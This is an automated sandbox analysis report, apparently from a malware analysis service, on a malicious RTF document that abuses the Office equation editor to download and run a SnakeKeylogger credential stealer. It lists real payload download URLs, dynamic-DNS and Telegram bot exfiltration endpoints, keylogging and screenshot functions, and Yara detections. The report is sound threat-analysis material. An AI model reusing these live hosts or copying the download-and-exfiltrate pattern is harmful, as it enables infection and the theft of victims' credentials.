Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:25:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.392546083.000000000061A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe7j
Source: EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exej
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exettC:
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408443204.0000000002674000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=net
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=wmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003811000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003748000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000381E000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000376A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Initial sample is an obfuscated RTF file
Source: initial sample Static file information: Filename: na.doc
Malicious sample detected (through community Yara rule)
Source: na.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
